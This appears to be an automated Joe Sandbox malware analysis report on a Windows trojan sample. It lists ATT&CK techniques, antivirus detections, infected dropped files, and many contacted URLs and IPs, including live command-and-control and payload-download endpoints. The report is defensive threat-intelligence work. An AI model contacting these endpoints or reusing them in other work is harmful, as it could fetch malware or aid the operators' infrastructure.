              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		11
              System Time Discovery              		1
              Taint Shared Content              		1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              Command and Scripting Interpreter              		4
              Windows Service              		1
              Access Token Manipulation              		3
              Obfuscated Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol11
              Input Capture              		4
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		Logon Script (Windows)4
              Windows Service              		12
              Software Packing              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared Drive11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Process Injection              		1
              DLL Side-Loading              		NTDS14
              System Information Discovery              		Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Access Token Manipulation              		LSA Secrets1
              Query Registry              		SSHKeylogging15
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Process Injection              		Cached Domain Credentials131
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Owner/User Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe97%ReversingLabsWin32.Virus.Jadtre
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe100%AviraW32/Jadtre.B
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\vXQpuA.exe100%AviraTR/Dldr.Small.Z.haljq
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
              C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
              C:\Users\user\AppData\Local\Temp\vXQpuA.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
              C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\vXQpuA.exe92%ReversingLabsWin32.Trojan.Madeba

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://upx.sf.net0%URL Reputationsafe
              http://crl.m0%URL Reputationsafe
              http://212.193.30.29/0%Avira URL Cloudsafe
              https://ipinfo.io/0%URL Reputationsafe
              http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rarx100%Avira URL Cloudmalware
              http://212.193.30.21/Corporation10%Avira URL Cloudsafe
              http://212.193.30.21/0%Avira URL Cloudsafe
              https://pastebin.com:443/raw/A7dSG1te0%Avira URL Cloudsafe
              http://212.193.30.21:80/service/communication.php0%Avira URL Cloudsafe
              http://212.193.30.21/service/communication.phpK0%Avira URL Cloudsafe
              https://twitter.com/telegram0%Avira URL Cloudsafe
              http://www.activestate.comHolger0%Avira URL Cloudsafe
              http://212.193.30.45/proxies.txt0%Avira URL Cloudsafe
              https://softs-portal.com/api/registerUser.phpg100%Avira URL Cloudmalware
              http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManager100%Avira URL Cloudmalware
              https://telegram.org/img/t_logo.png0%Avira URL Cloudsafe
              https://softs-portal.com/api/registerUser.php100%Avira URL Cloudmalware
              https://db-ip.com/0%Avira URL Cloudsafe
              http://212.193.30.45/0%Avira URL Cloudsafe
              http://www.microsoft.co0%Avira URL Cloudsafe
              http://www.baanboard.comBrendon0%Avira URL Cloudsafe
              http://wfsdragon.ru/api/setStats.php100%Avira URL Cloudphishing
              https://ipinfo.io/Content-Type:0%Avira URL Cloudsafe
              http://www.scintilla.org0%Avira URL Cloudsafe
              https://ipgeolocation.io/0%Avira URL Cloudsafe
              http://wfsdragon.ru/0%Avira URL Cloudsafe
              https://telegram.org/0%Avira URL Cloudsafe
              http://212.193.30.45/proxies.txtE0%Avira URL Cloudsafe
              http://wfsdragon.ru:80/api/setStats.php100%Avira URL Cloudphishing
              http://www.develop.com0%Avira URL Cloudsafe
              https://softs-portal.com/100%Avira URL Cloudmalware
              http://212.193.30.21/hp0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudphishing
              https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype0%Avira URL Cloudsafe
              http://www.spaceblue.com0%Avira URL Cloudsafe
              http://www.baanboard.com0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rar0100%Avira URL Cloudmalware
              http://ddos.dnsnb8.net:799/cj//k1.rar&100%Avira URL Cloudphishing
              http://www.develop.comDeepak0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rarras100%Avira URL Cloudphishing
              https://telegram.org/file/400780400431/1/-u0XrknOtfw.232636/60f98efd626b95d0100%Avira URL Cloudsafe
              https://core.telegram.org/api0%Avira URL Cloudsafe
              https://pastebin.com/raw/A7dSG1te0%Avira URL Cloudsafe
              http://www.rftp.comJosiah0%Avira URL Cloudsafe
              http://212.193.30.21/service/communication.phpk_0%Avira URL Cloudsafe
              http://212.193.30.29/server.txt0%Avira URL Cloudsafe
              http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
              http://www.activestate.com0%Avira URL Cloudsafe
              http://212.193.30.21/hp00%Avira URL Cloudsafe
              http://www.rftp.com0%Avira URL Cloudsafe
              http://www.spaceblue.comMathias0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rarI100%Avira URL Cloudphishing
              https://www.smartsharesystems.com/Morten0%Avira URL Cloudsafe
              http://212.193.30.21/service/communication.php00%Avira URL Cloudsafe
              https://pastebin.com/~0%Avira URL Cloudsafe
              http://www.lua.org0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rarW100%Avira URL Cloudphishing
              https://www.maxmind.com/en/locate-my-ip-address0%Avira URL Cloudsafe
              https://telegram.org/J0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net/100%Avira URL Cloudphishing
              http://212.193.30.21/service/communication.php0%Avira URL Cloudsafe
              https://telegram.org:443/P70%Avira URL Cloudsafe
              http://212.193.30.21/service/communication.php$0%Avira URL Cloudsafe
              https://telegram.org/file/400780400026/1/xwmW8Qofk5M.263566/16218cb12e7549e76b0%Avira URL Cloudsafe
              http://ddos.dnsnb8.net:799/cj//k1.rare100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              telegram.org
              		149.154.167.99
              		truefalse
                		unknown
                wfsdragon.ru
                		172.67.133.215
                		truefalse
                  		unknown
                  pastebin.com
                  		104.20.4.235
                  		truetrue
                    		unknown
                    ddos.dnsnb8.net
                    		unknown
                    		unknowntrue
                      		unknown
                      softs-portal.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://telegram.org/false
                        • Avira URL Cloud: safe
                        		unknown
                        https://pastebin.com/raw/A7dSG1tefalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://pastebin.com:443/raw/A7dSG1te611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://212.193.30.21/Corporation1611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://212.193.30.21:80/service/communication.php611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://212.193.30.29/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://twitter.com/telegram611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ddos.dnsnb8.net:799/cj//k1.rarxvXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://212.193.30.21/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://212.193.30.21/service/communication.phpK611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.activestate.comHolgerSciTE.exe.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://212.193.30.45/proxies.txt611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManagervXQpuA.exe, 00000001.00000002.2257628282.0000000000D15000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://softs-portal.com/api/registerUser.phpg611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://telegram.org/img/t_logo.png611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://212.193.30.45/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.microsoft.co611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://softs-portal.com/api/registerUser.php611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://db-ip.com/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.baanboard.comBrendonSciTE.exe.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://wfsdragon.ru/api/setStats.php611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        https://ipinfo.io/Content-Type:611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.smartsharesystems.com/SciTE.exe.1.drfalse
                          		unknown
                          http://www.scintilla.orgSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://wfsdragon.ru:80/api/setStats.php611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://ipgeolocation.io/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.45/proxies.txtE611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://wfsdragon.ru/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.21/hp611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.develop.comSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://softs-portal.com/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rarvXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.spaceblue.comSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rar0vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.baanboard.comSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.develop.comDeepakSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rar&vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://telegram.org/file/400780400431/1/-u0XrknOtfw.232636/60f98efd626b95d010611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rarrasvXQpuA.exe, 00000001.00000002.2257628282.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://core.telegram.org/api611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.rftp.comJosiahSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.29/server.txt611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.activestate.comSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEvXQpuA.exe, 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp, vXQpuA.exe, 00000001.00000003.2034288446.0000000000A40000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.21/service/communication.phpk_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.5.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.rftp.comSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.21/hp0611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rarIvXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.21/service/communication.php0611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.m611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://telegram.org/J611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ipinfo.io/611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exefalse
                          • URL Reputation: safe
                          		unknown
                          http://www.lua.orgSciTE.exe.1.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rarWvXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://pastebin.com/~611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.maxmind.com/en/locate-my-ip-address611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net/vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://212.193.30.21/service/communication.php611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://telegram.org:443/P7611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://212.193.30.21/service/communication.php$611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k1.rarevXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://telegram.org/file/400780400026/1/xwmW8Qofk5M.263566/16218cb12e7549e76b611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          212.193.30.21
                          		unknownRussian Federation
                          		57844SPD-NETTRfalse
                          104.20.4.235
                          		pastebin.comUnited States
                          		13335CLOUDFLARENETUStrue
                          212.193.30.45
                          		unknownRussian Federation
                          		57844SPD-NETTRfalse
                          172.67.133.215
                          		wfsdragon.ruUnited States
                          		13335CLOUDFLARENETUSfalse
                          212.193.30.29
                          		unknownRussian Federation
                          		57844SPD-NETTRfalse
                          149.154.167.99
                          		telegram.orgUnited Kingdom
                          		62041TELEGRAMRUfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1480302
                          Start date and time:2024-07-24 17:25:59 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                          Detection:MAL
                          Classification:mal100.spre.troj.evad.winEXE@4/9@7/6
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 21
                          • Number of non-executed functions: 89
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 104.208.16.94
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          11:27:12API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          212.193.30.21HogKe2gnNF.exeGet hashmaliciousCryptOne, PrivateLoader, SmokeLoaderBrowse
                          • 212.193.30.21/service/communication.php
                          bLvAFQEQFB.exeGet hashmaliciousCryptOne, SmokeLoaderBrowse
                          • 212.193.30.21/base/api/getData.php
                          File.exeGet hashmaliciousRedLineBrowse
                          • 212.193.30.21/base/api/getData.php
                          N0kodnmVTc.exeGet hashmaliciousPrivateLoader, RedLineBrowse
                          • 212.193.30.21/base/api/getData.php
                          File.exeGet hashmaliciousRedLineBrowse
                          • 212.193.30.21/base/api/getData.php
                          7D9E22E88F7B5ABF22553DFC438D8F40E17C33E8FC9FB.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.21/base/api/getData.php
                          ckc238HATk.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.21/base/api/statistics.php
                          ckc238HATk.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.21/base/api/statistics.php
                          TjDCLiM89x.exeGet hashmaliciousRedLineBrowse
                          • 212.193.30.21/base/api/getData.php
                          7nSmJgc4Js.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.21/base/api/getData.php
                          104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                          • pastebin.com/raw/V9y5Q5vv
                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Update on Payment.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          212.193.30.455DCF34F35A1874D190C81C7197785C4F4F9305842918F.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.45/proxies.txt
                          File.exeGet hashmaliciousDBatLoaderBrowse
                          • 212.193.30.45/proxies.txt
                          windows_update.exeGet hashmaliciousDBatLoaderBrowse
                          • 212.193.30.45/proxies.txt
                          File.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.45/proxies.txt
                          o1dXxyQmEx.exeGet hashmaliciousCryptOne, SmokeLoaderBrowse
                          • 212.193.30.45/proxies.txt
                          h9DGdo7AvB.exeGet hashmaliciousUnknownBrowse
                          • 212.193.30.45/proxies.txt
                          File.exeGet hashmaliciousPrivateLoaderBrowse
                          • 212.193.30.45/proxies.txt
                          HogKe2gnNF.exeGet hashmaliciousCryptOne, PrivateLoader, SmokeLoaderBrowse
                          • 212.193.30.45/proxies.txt
